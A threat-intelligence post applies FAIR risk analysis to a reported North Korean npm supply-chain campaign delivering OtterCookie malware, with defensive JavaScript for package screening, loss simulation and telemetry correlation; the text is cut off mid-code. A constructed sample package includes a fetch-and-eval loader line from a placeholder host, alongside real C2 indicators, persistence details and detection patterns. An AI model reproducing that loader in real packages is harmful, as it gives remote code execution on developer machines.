
How to Lose Crypto and Alienate Developers: A Guide by OtterCookie

  • Writer: FAIR INTEL

December 3, 2025


Synopsis

The analysis shows that a North Korean state-sponsored actor is running a sustained supply-chain campaign that compromises blockchain and Web3 developers by distributing malicious npm packages and GitHub/Vercel-hosted loaders that deploy the OtterCookie malware, enabling credential theft, seed-phrase exposure, remote access, and downstream compromise of production environments. Strategically, this intelligence requires organizations to reassess dependency-handling policies, supply-chain governance, and exposure conditions for developer teams; operationally, it drives tighter monitoring of npm installs, GitHub interactions, and outbound connections to staging or C2 infrastructure; and tactically, it informs detection engineering, endpoint hardening, and rapid response procedures for developer workstations. The threat elevates the overall risk posture by increasing both the likelihood and the potential magnitude of compromise, particularly when developer keys or wallet data can be used to pivot into production systems. Financial resilience is affected because compromise can directly translate into loss of digital assets, costly credential rotation, customer-impacting outages, regulatory exposure, and high incident-response costs, making proactive supply-chain controls and developer-focused defenses essential to stabilizing expected financial loss.


Evaluated Source, Context, and Claim

Artifact Title

Inside the GitHub Infrastructure Powering North Korea’s Contagious Interview npm Attacks


Source Type

Cybersecurity vendor threat research blog post


Publication Date: November 26, 2025


Credibility Assessment

Socket Threat Research is a specialized software supply chain security vendor that provides detailed technical analyses, including code snippets, IoCs, and infrastructure mapping, which supports moderate-to-high credibility. As a single-vendor source, its findings should ideally be correlated with independent reporting and additional telemetry where possible.


General Claim

The OSINT reports that North Korean state-sponsored operators are running the “Contagious Interview” campaign, using malicious npm packages, GitHub, and Vercel infrastructure, and the OtterCookie malware family to compromise blockchain and Web3 developers, exfiltrate credentials and wallet data, and remotely control infected systems for digital asset theft and espionage.


Narrative Reconstruction

The information describes a North Korean state-sponsored threat actor operating the Contagious Interview campaign, which targets blockchain and Web3 developers by posing as legitimate recruiters and assigning “test projects” that require victims to clone GitHub repositories and install npm dependencies laced with malicious packages such as tailwind-magic and node-tailwind. These packages act as loaders, contacting a Vercel-hosted staging server (tetrismic[.]vercel[.]app) that serves a main.js payload from a threat-controlled GitHub repository and ultimately executes an OtterCookie malware variant that establishes long-lived command-and-control to a dedicated server, performs VM and sandbox checks, and then launches parallel modules for clipboard theft, keylogging, multi-monitor screenshots, browser credential harvesting, wallet-extension data exfiltration, and recursive filesystem scanning. The primary assets at risk are developer endpoints, their browsers’ credential stores, crypto wallet extensions, seed phrases, keys, and sensitive source or configuration files on local disks and mounted volumes, which collectively provide access to digital assets, development environments, and potentially production infrastructure. Operationally, the campaign aims to turn npm installs and template use into a renewable initial-access vector that delivers persistent remote access to high-value developer systems, enabling both cryptocurrency theft and broader compromise of organizations that rely on those developers’ credentials, signing keys, and secrets.


Risk Scenario

A North Korean state-sponsored supply chain actor compromises blockchain and Web3 developers’ endpoints by delivering OtterCookie malware through malicious npm packages and GitHub/Vercel-hosted loaders, resulting in theft of crypto assets and sensitive credentials and enabling further compromise of organizational systems and data.


Threat

A state-sponsored North Korean threat group running the Contagious Interview campaign uses fake job interviews and developer “test assignments” to induce targets to pull threat-controlled GitHub projects and install npm dependencies that include malicious packages (for example, tailwind-magic, tailwind-node, node-tailwind) wired into common utility functions. The actor maintains and rotates supporting infrastructure on GitHub, Vercel, and dedicated C2 servers, and deploys OtterCookie as a multi-function infostealer and remote access trojan tuned for developer environments and crypto-focused workflows.


Method

The threat exploits trust in open-source ecosystems and recruitment workflows: victims install typosquatted or deceptive npm packages whose postinstall or import-time loaders fetch and eval a JavaScript payload from tetrismic[.]vercel[.]app, which in turn runs OtterCookie and registers the host with C2 at 144[.]172[.]104[.]117:5918. Once active, the malware performs host fingerprinting and anti-VM checks, then spawns separate modules for clipboard monitoring and remote shell, browser credential and wallet-extension theft (Chrome/Brave, multiple crypto wallets), keylogging, multi-monitor screenshot capture, and recursive scanning and exfiltration of files whose names suggest secrets, wallets, or sensitive documents, while establishing persistence (for example, Run keys and scheduled tasks on Windows).


Asset

Primary assets include developer workstations and laptops used for JavaScript, Web3, and DeFi development; their local development environments and CI-adjacent tooling; browser credential stores for Chrome and Brave; cryptocurrency wallet extensions, seed phrases, private keys, and configuration files; and any secrets, keys, or sensitive documents stored on local disks or mounted file systems that could be used to access production wallets, signing infrastructure, or cloud administration interfaces.


Impact

If the scenario materializes, the organization can suffer direct financial loss from theft or misuse of cryptocurrency and other digital assets controlled from compromised developer endpoints; secondary compromise of production services or customer environments via stolen credentials and keys; exposure of proprietary source code and sensitive documents; regulatory or contractual consequences where customer data or financial systems are affected; and additional incident response, remediation, and monitoring costs, along with reputational damage among customers, partners, and the broader Web3 ecosystem.

 

Evidentiary Basis for Synopsis and Recommendations

Supporting observations from the analysis help clarify how the threat landscape, control environment, and organizational behaviors interact to shape overall risk exposure. These insights provide the foundation for identifying where controls perform well, where gaps or weaknesses create unnecessary vulnerability, and how attacker methods intersect with real-world operational conditions. Building on these findings, the recommendations that follow focus on strengthening resilience, improving decision-making, and guiding readers toward practical steps that enhance both security posture and risk-informed governance.


FAIR Breakdown

Threat Event Frequency (TEF)

Because the OSINT describes a large, ongoing npm supply-chain campaign with 197 new malicious packages and over 31,000 additional downloads in a recent wave, TEF for a single organization must be inferred from ecosystem-scale activity. For a mid-size blockchain/Web3 development organization that frequently pulls npm packages and uses GitHub/Vercel-based templates, TEF is best characterized as moderate-to-high, reflecting regular exposure to malicious packages and lures rather than rare, one-off contact.


Contact Frequency (CF)

The campaign pushes dozens of loader packages into the npm ecosystem and keeps at least some of them live at any given time. At the same time, new infiltrations appear weekly, suggesting a steady background level of malicious packages available to developers resolving dependencies. Combined with cloned crypto/DEX front ends and GitHub lure repositories, this creates a moderate CF at the single-organization level (multiple opportunities per year for a team that regularly installs new packages), even though the global ecosystem sees much higher contact rates. Sector targeting is relatively focused: blockchain/Web3, DeFi, token projects, and crypto-adjacent JavaScript developers are explicitly in scope, while more generic enterprise developers are exposed primarily through transitive dependencies and reused templates rather than direct recruiter lures.


Probability of Action (PoA)

The information explicitly attributes this to North Korean state-sponsored operators with a clear financial and strategic interest in draining digital assets and harvesting developer credentials, which strongly supports a high PoA once a viable contact point is found. The factory-style operation, the continuous introduction of new packages, the maintenance of dedicated C2 infrastructure, and the reuse of successful techniques across multiple repositories all indicate that the actors are both motivated and committed to acting aggressively whenever a developer installs one of their packages or engages with their lures.


Threat Capability (TCap)

TCap is high-to-very-high, as the campaign combines sophisticated supply-chain access, cross-platform malware, and operational discipline.


Exploit sophistication: Rather than relying on classic CVE exploitation, the actors exploit the npm/GitHub/Vercel trust chain, typosquatting legitimate utilities (tailwind-merge) and embedding postinstall or import-time loaders that achieve arbitrary code execution during normal dependency resolution; this reflects high sophistication in abusing modern JavaScript workflows.


Bypass ability: The loaders execute within legitimate Node.js processes, and OtterCookie includes VM/sandbox checks, multi-process detaching, and host fingerprinting, which helps it evade basic sandboxes and some endpoint monitoring, showing strong defensive bypass capability.


Tooling maturity: OtterCookie is a mature, multi-stage RAT/infostealer with remote shell, clipboard theft, keylogging, cross-platform browser credential theft, wallet-extension targeting, screenshotting, and large-scale filesystem exfiltration, all orchestrated via structured C2 APIs—clearly not a one-off or amateur toolset.


Campaign success rate: While the information does not give explicit compromise counts, the 31,000+ downloads in a short window and repeated reinfection of npm with new packages suggest that at least some measurable fraction of downloads result in execution; within the targeted Web3/crypto developer population, this implies a moderate-to-high success rate when controls are weak.


Attack path sophistication: The full path—fake job/test assignment or lure template, GitHub-hosted project with malicious dependencies, npm loader that calls Vercel stager, dynamic retrieval and eval of payload, and then a staged OtterCookie RAT with parallel workers and persistence—demonstrates a sophisticated, multi-hop attack chain designed for resilience and flexibility.


Cost to run attack: Once the malware family, staging stack, and automation are built, the marginal cost of publishing new npm packages, cloning repos, and rotating payloads is relatively low for a state-backed group, making the campaign economically feasible to sustain over long periods.


Control Strength (CS)

Many dev teams do not systematically treat npm installs as remote code execution, so:

  • Pre-install screening is inconsistent or absent.

  • Lockfile enforcement and strict dependency policies are often weak.

  • Behavioral package analysis (e.g., detecting eval on network responses) is rarely enforced.

  • Where dependency scanning and code review exist, they may:

    • Catch obvious red flags (unknown utilities, unstable ownership, suspicious metadata).

    • Miss sophisticated loaders that mimic legitimate utilities and hide import-time behavior.

  • Network and environment controls are uneven:

    • Some organizations lack tight egress controls from developer endpoints and CI runners.

    • Build agents may reach arbitrary internet hosts, enabling staging/C2 communication.

  • Overall control strength (resistance strength, RS) for a typical mid-size Web3 dev org is:

    • Moderate at best if they have explicit supply-chain controls.

    • Low-to-moderate, where such controls are immature or ad hoc.
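The screening gaps listed above (no pre-install check, no behavioral analysis of import-time or postinstall code) can be closed with a simple gate that runs before `npm install` is allowed to execute lifecycle scripts. The block below is an added example written for this post, not code from Socket or from the FAIR INTEL analysis. It takes a package's files in memory as a `{ path: contents }` map so it runs offline, and flags lifecycle scripts, dynamic execution sitting next to network I/O (the eval-on-network-response loader pattern), detached child processes, and names that collide with a well-known package. The allow-list, the regexes, the severity thresholds and the constructed sample packages (with a placeholder staging URL) are all assumptions of this example.

```javascript
// Added example for this post (not Socket's or FAIR INTEL's code): a pre-install
// screen for an npm package. The package is handed in as { path: contents } so the
// check runs offline and can be wired in front of `npm install` in CI.

// Assumed allow-list of well-known packages whose names the screen protects.
const KNOWN_PACKAGES = ['tailwind-merge', 'tailwindcss', 'lodash', 'axios'];
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
const NETWORK_RE = /\b(fetch|axios|https?\.(get|request)|XMLHttpRequest)\b/;
const DYNAMIC_EXEC_RE = /\b(eval|Function)\s*\(/;
const DETACH_RE = /detached\s*:\s*true/;

// Distinctive name tokens (length >= 5) used for the brand-collision heuristic.
function tokens(name) {
  return name.replace(/^@[^/]+\//, '').split(/[-_.]/).filter(t => t.length >= 5);
}

function screenPackage(files) {
  const findings = [];
  const manifest = JSON.parse(files['package.json'] || '{}');
  const name = manifest.name || '<unnamed>';

  // 1. Lifecycle scripts run arbitrary code during dependency resolution.
  for (const hook of LIFECYCLE_HOOKS) {
    if (manifest.scripts && manifest.scripts[hook]) {
      findings.push({ severity: 'high', rule: 'lifecycle-script',
                      detail: `${hook}: ${manifest.scripts[hook]}` });
    }
  }

  // 2. Name shares a distinctive token with a well-known package but is not it.
  if (!KNOWN_PACKAGES.includes(name)) {
    for (const known of KNOWN_PACKAGES) {
      const shared = tokens(name).filter(t => tokens(known).includes(t));
      if (shared.length) {
        findings.push({ severity: 'medium', rule: 'name-collision',
                        detail: `${name} resembles ${known} (shared token "${shared[0]}")` });
      }
    }
  }

  // 3. Per-file heuristics: dynamic execution next to network I/O is the loader
  //    pattern; detached child processes are how stealer modules get spawned.
  for (const [path, src] of Object.entries(files)) {
    if (!path.endsWith('.js')) continue;
    const hasNet = NETWORK_RE.test(src);
    const hasExec = DYNAMIC_EXEC_RE.test(src);
    if (hasNet && hasExec) {
      findings.push({ severity: 'critical', rule: 'eval-on-network-response', detail: path });
    } else if (hasExec) {
      findings.push({ severity: 'medium', rule: 'dynamic-execution', detail: path });
    }
    if (DETACH_RE.test(src)) {
      findings.push({ severity: 'high', rule: 'detached-subprocess', detail: path });
    }
  }

  const rank = { critical: 3, high: 2, medium: 1 };
  const worst = findings.reduce((m, f) => Math.max(m, rank[f.severity]), 0);
  const verdict = worst >= 2 ? 'block' : worst === 1 ? 'review' : 'allow';
  return { name, verdict, findings };
}

// Constructed sample modeled on the loader described above; the URL is a placeholder.
const SUSPECT_PACKAGE = {
  'package.json': JSON.stringify({
    name: 'tailwind-magic', version: '1.0.0', main: 'src/lib/index.js',
    scripts: { postinstall: 'node src/lib/index.js' },
  }),
  'src/lib/index.js': [
    "const axios = require('axios');",
    "axios.get('https://staging.example.invalid/main.js').then(r => eval(r.data));",
    "module.exports = { twMerge: (...classes) => classes.join(' ') };",
  ].join('\n'),
};

// Constructed benign package for comparison.
const BENIGN_PACKAGE = {
  'package.json': JSON.stringify({ name: 'left-pad-lite', version: '0.1.0', main: 'index.js' }),
  'index.js': 'module.exports = (s, n) => String(s).padStart(n);',
};

console.log(JSON.stringify(screenPackage(SUSPECT_PACKAGE), null, 2));
console.log(screenPackage(BENIGN_PACKAGE).verdict);
```

Run it in CI against the unpacked tarball before the install step, ideally together with `ignore-scripts=true` in the project's `.npmrc` so that lifecycle scripts never execute unreviewed. The eval-next-to-fetch rule will also fire on some legitimate packages, so a `block` verdict is best treated as a hold for human review rather than an automatic rejection.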


Control Failure Rate

Human and process failures are common:

  • Developers accept recruiter-provided repos or templates with limited scrutiny.

  • New “utility” packages are added to global helpers without deep review.

  • Time pressure encourages trusting popular-looking npm packages and GitHub stars.

  • Technical and governance gaps increase failure likelihood:

    • No enforced policy for third-party package vetting or owner reputation checks.

    • Limited or no behavioral analysis for post-install/import-time behaviors.

    • Weak separation between build environments, developer endpoints, and production secrets.

  • Monitoring and detection gaps further raise the failure rate:

    • Minimal telemetry focused on developer endpoints and CI runners.

    • Little alerting on suspicious outbound connections or anomalous npm behavior.

  • Net result:

    • Control failure rate against this specific npm/GitHub/Vercel supply-chain path is best characterized as moderate-to-high for a typical Web3 development shop.


Susceptibility

Given high threat capability and only moderate control strength in many Web3 development environments, overall susceptibility for a typical mid-size blockchain/Web3 organization that actively uses npm and GitHub is reasonably estimated at around 50 percent (with a plausible range of roughly 40–60 percent) per meaningful contact.

The probability that the asset will be harmed is influenced by:


Exploitability: Once a malicious package is installed and executed, technical exploit barriers are low—the loader has Node.js-level execution and OtterCookie handles privilege and persistence—so exploitability per contact is high; the main barrier is whether controls prevent or detect the package before or shortly after use.

Attack surface: Organizations that frequently introduce new dependencies, experiment with templates, and engage in Web3/DeFi projects have a large attack surface, as each new project, template, or npm install is a potential contact point; this supports a moderate-to-high exposure fraction among developers.

Exposure conditions: During periods of active hiring, test assignments, and rapid prototyping of new DEX/token projects, developers are more likely to accept recruiter-provided repos and “example” templates, increasing the likelihood that a malicious package executes before it is noticed.

Patch status: Traditional OS or library patching has limited protective effect here because the attack path hinges on supply-chain trust rather than on exploiting known CVEs; patching still matters for defense-in-depth, but it does little to reduce the core exploitability of a malicious npm loader.


Numerical Frequencies and Magnitudes

All values relating to actual dollar amounts are for example/speculative purposes only. Organizations would need to take into account their own asset values, control strength, telemetry, etc., and adjust numbers accordingly.


Loss Event Frequency (LEF)

2/year (estimated)

  • Justification: For a mid-size blockchain/Web3 development organization that frequently installs npm packages and occasionally consumes new templates or recruiter-supplied projects, assume an underlying Threat Event Frequency (contacts) of about 4 meaningful opportunities per year where a malicious package from this campaign could be introduced. With an estimated vulnerability (probability of harm per contact) of 0.5, this yields an approximate Loss Event Frequency of 2 successful compromise events per year.

Vulnerability (probability of harm per contact): 0.5

  • Justification: Given high threat capability, moderate control strength, and the reliance on developer behavior and supply-chain controls that are often imperfectly implemented, it is reasonable to assume that roughly half of meaningful contacts (e.g., installs of malicious packages that reach developers or CI) could progress to a realized loss event in the absence of strong, specifically tuned safeguards.


Secondary Loss Event Frequency

1/year (estimated)

  • Justification: Not every primary compromise will lead to secondary losses such as large-scale wallet theft, downstream cloud compromise, or customer-impacting events; however, because OtterCookie aggressively harvests credentials, wallet data, and secrets, it is plausible that about half of primary incidents result in some secondary consequence, giving an estimated SLEF of roughly one secondary loss event per year for the assumed organization.


Loss Magnitude

Estimated range:

  • Min: $50,000

  • Most Likely: $400,000

  • Maximum: $3,000,000

Justification:

  • The minimum bound represents cases where the compromise is contained largely to a single developer endpoint with limited direct crypto exposure, covering incident response, forensics, re-imaging, and engineering time to rotate credentials and review code. The most likely value assumes some theft or misuse of wallets and secrets accessible from the compromised environment, plus broader remediation and lost productivity. The maximum case allows for a high-value developer whose keys and wallets control significant on-chain assets or production integrations, where compromise could enable substantial direct financial theft and more extensive recovery.


Secondary Loss Magnitude (SLM)

Estimated range:

  • Min: $250,000

  • Most Likely: $2,000,000

  • Maximum: $15,000,000

Justification:

  • Secondary losses arise when stolen credentials, wallets, or secrets are used to access production wallets, DeFi protocols, or cloud environments, resulting in customer-impacting incidents, regulatory exposure, contractual penalties, reputational harm, and technical recovery costs. The minimum bound assumes limited customer impact and relatively contained on-chain loss; the most likely value reflects a moderate on-chain theft plus legal, PR, and extended IR costs; and the maximum allows for a high-impact event involving substantial digital-asset theft, service disruption, and regulatory scrutiny in a heavily crypto-exposed business.
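As an added worked example (not part of the original FAIR INTEL post), the block below carries the estimates above through the FAIR arithmetic: LEF = TEF × Vulnerability = 4 × 0.5 = 2, the closed-form annualized loss expectancy LEF·E[LM] + SLEF·E[SLM], and a seeded Monte Carlo that draws loss-event counts from a Poisson distribution and magnitudes from triangular (min / most likely / max) distributions. The Poisson and triangular choices are modelling assumptions of this example, and the dollar figures are the speculative ones stated above, so the output illustrates the method rather than any organization's actual exposure.

```javascript
// Added example (not part of the original FAIR INTEL post): carries the estimates
// above through the FAIR arithmetic and a seeded Monte Carlo. The Poisson event
// model and triangular magnitude distributions are assumptions of this example.

const SCENARIO = {
  tef: 4,      // Threat Event Frequency: meaningful contacts per year (stated above)
  vuln: 0.5,   // Vulnerability: probability of harm per contact (stated above)
  slef: 1,     // Secondary Loss Event Frequency per year (stated above)
  lm:  { min: 50000,  mode: 400000,  max: 3000000 },   // Loss Magnitude, USD
  slm: { min: 250000, mode: 2000000, max: 15000000 },  // Secondary Loss Magnitude, USD
};

// LEF = TEF x Vulnerability, as in the justification above.
function lef(tef, vuln) { return tef * vuln; }

// Mean of a triangular(min, mode, max) distribution.
function triangularMean({ min, mode, max }) { return (min + mode + max) / 3; }

// Closed-form annualized loss expectancy: LEF*E[LM] + SLEF*E[SLM].
function expectedAnnualLoss(s) {
  return lef(s.tef, s.vuln) * triangularMean(s.lm) + s.slef * triangularMean(s.slm);
}

// Small seeded PRNG so the simulation is reproducible.
function mulberry32(seed) {
  let a = seed >>> 0;
  return () => {
    a = (a + 0x6D2B79F5) | 0;
    let t = Math.imul(a ^ (a >>> 15), 1 | a);
    t = (t + Math.imul(t ^ (t >>> 7), 61 | t)) ^ t;
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296;
  };
}

// Inverse-CDF draw from triangular(min, mode, max) given uniform u in [0, 1).
function sampleTriangular(u, { min, mode, max }) {
  const fc = (mode - min) / (max - min);
  return u < fc
    ? min + Math.sqrt(u * (max - min) * (mode - min))
    : max - Math.sqrt((1 - u) * (max - min) * (max - mode));
}

// Knuth's Poisson sampler; adequate for the small rates used here.
function samplePoisson(rand, lambda) {
  const limit = Math.exp(-lambda);
  let k = 0, p = 1;
  do { k += 1; p *= rand(); } while (p > limit);
  return k - 1;
}

// Simulate `years` independent years and summarise the annual loss distribution.
function simulate(s, years = 20000, seed = 1) {
  const rand = mulberry32(seed);
  const losses = new Float64Array(years);
  for (let y = 0; y < years; y++) {
    let total = 0;
    const primary = samplePoisson(rand, lef(s.tef, s.vuln));
    for (let i = 0; i < primary; i++) total += sampleTriangular(rand(), s.lm);
    const secondary = samplePoisson(rand, s.slef);
    for (let i = 0; i < secondary; i++) total += sampleTriangular(rand(), s.slm);
    losses[y] = total;
  }
  const sorted = Float64Array.from(losses).sort();
  const pct = q => sorted[Math.min(years - 1, Math.floor(q * years))];
  const mean = losses.reduce((acc, v) => acc + v, 0) / years;
  return { mean, p50: pct(0.5), p90: pct(0.9), p99: pct(0.99) };
}

console.log('LEF per year:', lef(SCENARIO.tef, SCENARIO.vuln));
console.log('Expected annual loss (closed form):', expectedAnnualLoss(SCENARIO));
console.log('Simulated annual loss summary:', simulate(SCENARIO));
```

The closed-form figure is what a single-point estimate gives you; the percentiles from `simulate` are what a board or an insurer actually needs, because the p90 and p99 of this distribution are dominated by the secondary-loss tail, which is where the control investments discussed in this post (egress filtering, secret separation, pre-install screening) move the numbers.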


Mapping, Controls, and Modeling


MITRE ATT&CK Mapping

Resource Development

T1584 – Compromise Infrastructure

Reference: “A Vercel-hosted staging endpoint, tetrismic[.]vercel[.]app… a threat actor-controlled GitHub account, stardev0914…”

T1587.001 – Malware Development

Reference: “The payload itself is a recent OtterCookie malware variant…”

T1583.006 – Web Services

Reference: “Vercel serves the latest payload… GitHub hosts the development repository.”

T1583.004 – Server Infrastructure

Reference: “A separate C2 server handles data collection and tasking.”

T1608.001 – Upload Malicious Tools

Reference: “197 malicious npm packages… at least five malicious npm packages… rely on this infrastructure to deliver a second-stage payload.”

Initial Access

T1195 – Supply Chain Compromise

Reference: “The campaign… infiltrates the npm ecosystem… at least 197 malicious npm packages…”

T1204.002 – User Execution: Malicious File

Reference: “A victim installs a malicious npm package that fetches a payload…”

T1199 – Trusted Relationship

Reference: “Targets… through fake job interviews and ‘test assignments’… recruiter personas pointing victims to GitHub repositories.”

Execution

T1059.007 – JavaScript Execution

Reference: “The package… executes src/lib/index.js… eval the returned JavaScript.”

T1059.003 – Command Execution via Shell

Reference: “Exec returned command… remote shell… execute arbitrary command from C2.”

T1059 – Command and Scripting Interpreter

Reference: “Node.js process privileges… executed with eval() inside the victim’s Node.js process.”

T1204.003 – Execution via Malicious Module Load

Reference: “The exported API behaves like a normal utility, but… import-time loader executes threat actor code.”

Persistence

T1547.001 – Registry Run Keys / Startup Folder

Reference: “Adds a Run entry HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ‘NodeHelper’.”

T1053.005 – Scheduled Task

Reference: “Creates a scheduled task NodeUpdate to run node <dir>\index.js at logon.”

Defensive Evasion

T1497 – Virtualization/Sandbox Evasion

Reference: “Performs VM and sandbox detection… flags systems whose output contains vmware, virtualbox…”

T1027 – Obfuscated/Hidden Code

Reference: “Hex-escaped payload strings… eval of remote JavaScript…”

T1036 – Masquerading

Reference: “Typosquatted clone of the legitimate tailwind-merge library… appears to be harmless utilities.”

Credential Access

T1555.003 – Credentials from Web Browsers

Reference: “Collection of browser credentials and wallet extension data from Chrome and Brave.”

T1552 – Unsecured Credentials

Reference: “Harvest… seed phrases, wallet data, sensitive documents.”

Discovery

T1082 – System Information Discovery

Reference: “Fingerprints the host… OS, platform, hostname, userinfo…”

T1497.001 – System Checks for Analysis Artifacts

Reference: “VM and sandbox detection… system_profiler… /proc/cpuinfo.”

T1083 – File and Directory Discovery

Reference: “Recursive file-system search for secrets, wallets, and sensitive documents.”

Collection

T1113 – Screen Capture

Reference: “Multi-monitor screenshot capture.”

T1056.001 – Keylogging

Reference: “System-wide keylogging.”

T1115 – Clipboard Data

Reference: “Continuous clipboard theft.”

T1005 – Data from Local System

Reference: “Recursive search… harvesting credentials, seed phrases, wallet data, sensitive documents.”

Command and Control

T1071.001 – Web Protocols

Reference: “C2 traffic goes to http://144[.]172[.]104[.]117:5918…”

T1102 – Web Services C2

Reference: “Loader fetches payload from tetrismic[.]vercel[.]app… communicates back to C2 server.”

T1219 – Remote Access Tools

Reference: “Provides an interactive remote shell… long-lived C2 channel.”

Exfiltration

T1041 – Exfiltration Over C2 Channel

Reference: “Clipboard data exfiltration… POST to /clip… upload of files to /total.”

T1567.002 – Exfiltration to Cloud Services

Reference: “Exfiltration via Vercel-hosted infrastructure and C2 endpoints.”


NIST 800-53 Affected Controls

SC-18(1) — Mobile Code | Prohibit Unauthorized Mobile Code

The malicious npm packages execute JavaScript supplied remotely by a threat actor, violating the intent of SC-18(1) to restrict unapproved or unvetted mobile code.

Reference: “Postinstall script… eval the returned JavaScript… granting the threat actor arbitrary code execution with full Node.js process privileges.”

This bypasses organizational controls intended to prevent execution of untrusted or dynamically fetched code.

SA-12(3) — Supply Chain Protection | Software Integrity Verification

The campaign relies on typosquatting and deceptive npm packages that impersonate legitimate utilities, directly targeting controls that require verification of supplier integrity.

Reference: “tailwind-magic is a typosquatted and backdoored clone of the legitimate tailwind-merge library.”

This activity intentionally defeats integrity validation requirements for third-party software dependencies.

SA-11(1) — Developer Testing and Evaluation | Static and Dynamic Code Analysis

Malicious loaders hide harmful behavior inside what appears to be benign class-merging utilities, bypassing static and dynamic analysis that organizations should perform.

Reference: “The exported API behaves like a normal Tailwind class-merging helper… import-time loader executes threat actor-controlled code.”

This demonstrates evasion of expected software evaluation controls during dependency onboarding.

CM-7(2) — Least Functionality | Restrict Software Functionality

Node.js processes run attacker-provided JavaScript and spawn subprocesses with broad system access, violating restrictions on the functionality of executed code.

Reference: “Executes remote payload with eval()… spawns separate, detached Node.js processes performing keylogging and filesystem scanning.”

This indicates a breakdown in enforcing the least functionality in developer environments.

SI-4(14) — System Monitoring | Detect Unauthorized Commands

The RAT provides a remote shell allowing arbitrary command execution while avoiding detection, directly challenging monitoring controls.

Reference: “Polls /command… execute arbitrary command from C2… POST output back to server.”

This explicitly bypasses detection mechanisms meant to identify unauthorized command execution.

SI-3 — Malicious Code Protection

OtterCookie performs classic malicious-code behaviors—keylogging, credential theft, file exfiltration—undetected in the development environment.

Reference: “Multi-stage infostealer and remote access trojan… clipboard theft… keylogging… recursive filesystem scanning.”

Failure to detect or prevent this malware reflects a breakdown in SI-3 protections.

SC-7(5) — Boundary Protection | Prevent Unauthorized Exfiltration

The malware exfiltrates browser credentials, screenshots, and secrets over HTTP to the C2 server, bypassing outbound filtering.

Reference: “All C2 traffic goes to 144[.]172[.]104[.]117… uploads files to /total.”

This indicates insufficient boundary controls preventing outbound exfiltration.

AC-6(10) — Least Privilege | Prevent Privilege Abuse

The malware uses the privileges of the authorized user to establish persistence, run background processes, and access browser credential stores.

Reference: “Creates scheduled task NodeUpdate… adds Run entry… accesses Chrome and Brave login databases.”

This shows ineffective enforcement of least privilege in developer endpoints.

PL-8 — Security and Privacy Architectures

The overall architecture of the attack bypasses organizational software supply-chain protections, violating architectural requirements for secure system design.

Reference: “npm, GitHub, and Vercel as a combined, renewable initial access channel.”

This shows failure to architect systems to prevent a chained supply-chain compromise.

RA-5 — Vulnerability Monitoring and Scanning

Malicious dependencies present in production repositories indicate insufficient vulnerability scanning of npm modules.

Reference: “15 malicious npm packages remain live at the time of writing… reported to npm security team.”

Failure to identify malicious packages before import represents a breakdown in RA-5 processes.


Threat Model

Threat model from original artifact

Monitoring, Hunting, Response, and Reversing

Monitoring

Monitoring for the Contagious Interview / OtterCookie campaign requires telemetry from developer endpoints (Node.js process creation, JavaScript execution patterns, clipboard access, screenshot APIs, filesystem traversal spikes), network egress logs for connections to Vercel-hosted staging domains and the C2 server (144[.]172[.]104[.]117:5918), DNS logs for typosquatted npm package lookups, GitHub API activity from developer machines, and identity logs indicating access to suspicious recruiter-shared repositories. Logging sufficiency requires elevated levels of Node.js runtime events, filesystem access, persistence points (registry run keys, scheduled tasks), browser credential database reads, and outbound HTTP POST activity not associated with typical development workflows. Key indicators include npm package installs with postinstall or import-time eval behavior, eval() of remote JavaScript, unexpected calls to tetrismic[.]vercel[.]app, spawning of detached Node.js subprocesses, rapid recursive file enumeration, and consistent clipboard polling. Monitoring gaps include weak telemetry for developer endpoints, a lack of egress filtering, limited inspection of npm install behaviors, and insufficient visibility into GitHub template pulls. Correlation logic should combine npm install events, connections to threat infrastructure, new persistence entries, and browser credential database access to generate high-confidence alerts, with thresholds tuned to flag any eval-on-network-response behavior as critical. Dashboards should track npm supply-chain installs, anomalous external connections, persistence creation, and browser data access patterns; metrics should visualize deviation from baseline endpoint activity. Validation should rely on replaying safe, simulated malicious package installs to ensure that alerting, correlation, and dashboards accurately reflect the described behaviors.


Hunting

Hunting should begin with hypotheses that malicious npm packages have been installed on developer systems or CI runners and that Node.js processes are performing unauthorized remote loading, clipboard theft, credential harvesting, or filesystem scanning. Required telemetry sources include endpoint process logs, Node.js execution traces, npm audit/install logs, GitHub clone history, DNS to tetrismic[.]vercel[.]app, and outbound HTTP traffic to 144[.]172[.]104[.]117. Detection logic should focus on identifying eval() on remote responses, Node.js processes spawning detached subprocesses, repeated clipboard reads, access to Chrome/Brave credential databases, cross-platform screenshot API calls, and rapid read-heavy traversal of mounted storage paths. Noise-to-signal considerations are significant in developer environments where legitimate Node.js activity is high, requiring filtering by rare behaviors such as VM-check routines, scheduled task creation by node.exe, or HTTP POST of clipboard/screenshot content.
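The correlation logic described in the Monitoring section and the hunt hypotheses above can be prototyped directly against endpoint and network telemetry. The block below is an added example written for this post, not detection content from Socket or FAIR INTEL: it classifies constructed sample events (the field names, the event shapes and the 30-minute window are assumptions) into the behaviour classes named above and raises one alert per host when an npm install is followed by contact with the reported infrastructure, persistence creation, detached Node.js processes, or reads of browser credential stores. The two infrastructure indicators are the ones quoted in the report.

```javascript
// Added example (not from the original post): correlate constructed endpoint and
// network telemetry into one alert per host, following the monitoring and hunting
// guidance above. Event shapes, field names and the window are assumptions.

// Infrastructure indicators quoted in the report (defanged in the prose above).
const IOC_HOSTS = new Set(['tetrismic.vercel.app', '144.172.104.117']);
const WINDOW_MS = 30 * 60 * 1000;

// Each classifier maps a raw event to a behaviour class from the hunt hypotheses.
const CLASSIFIERS = [
  { cls: 'npm_install', match: e => e.type === 'process' && /^npm (i|install)\b/.test(e.cmd || '') },
  { cls: 'c2_contact', match: e => e.type === 'network' && IOC_HOSTS.has(e.dest) },
  { cls: 'persistence', match: e =>
      (e.type === 'registry' && /\\CurrentVersion\\Run$/i.test(e.key || '') && /node/i.test(e.value || '')) ||
      (e.type === 'schtask' && /\bnode\b/i.test(e.command || '')) },
  { cls: 'browser_cred_read', match: e =>
      e.type === 'file' && e.op === 'read' && /(Login Data|Local Extension Settings)/.test(e.path || '') &&
      /^node/i.test(e.process || '') },
  { cls: 'detached_node', match: e =>
      e.type === 'process' && /^node/i.test(e.image || '') && /^node/i.test(e.parent || '') && e.detached === true },
];

function classify(event) {
  return CLASSIFIERS.filter(c => c.match(event)).map(c => c.cls);
}

// For every npm install on a host, gather the behaviour classes seen within WINDOW_MS
// after it. Contact with known infrastructure is critical on its own; otherwise the
// number of distinct behaviour classes drives severity, so the rule still fires when
// the staging domain or C2 address has rotated.
function correlate(events) {
  const byHost = new Map();
  for (const e of events) {
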